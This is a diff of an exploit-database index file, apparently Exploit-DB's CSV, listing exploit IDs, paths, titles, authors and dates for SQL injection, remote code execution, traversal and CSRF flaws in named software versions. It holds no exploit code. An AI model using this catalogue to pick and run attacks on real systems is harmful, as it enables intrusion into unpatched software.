44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php,
|
||||
44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android,
|
||||
44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
|
||||
44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Unauthenticated Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -38564,7 +38571,7 @@ id,file,description,date,author,type,platform,port
|
|||
42585,exploits/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php,
|
||||
42588,exploits/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",webapps,hardware,
|
||||
42589,exploits/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",webapps,php,
|
||||
42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php,
|
||||
42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php,
|
||||
42591,exploits/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,webapps,php,
|
||||
42592,exploits/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",webapps,php,
|
||||
42595,exploits/php/webapps/42595.txt,"PHP-SecureArea < 2.7 - Multiple Vulnerabilities",2017-08-30,Cryo,webapps,php,
|
||||
|
@ -38961,4 +38968,5 @@ id,file,description,date,author,type,platform,port
|
|||
44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,
|
||||
44241,exploits/windows/webapps/44241.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
|
||||
44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80
|
||||
44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,
|
||||
44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,
|
||||
44256,exploits/multiple/webapps/44256.html,"Bravo Tejari Web Portal - Cross-Site Request Forgery",2018-03-06,"Arvind V",webapps,multiple,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue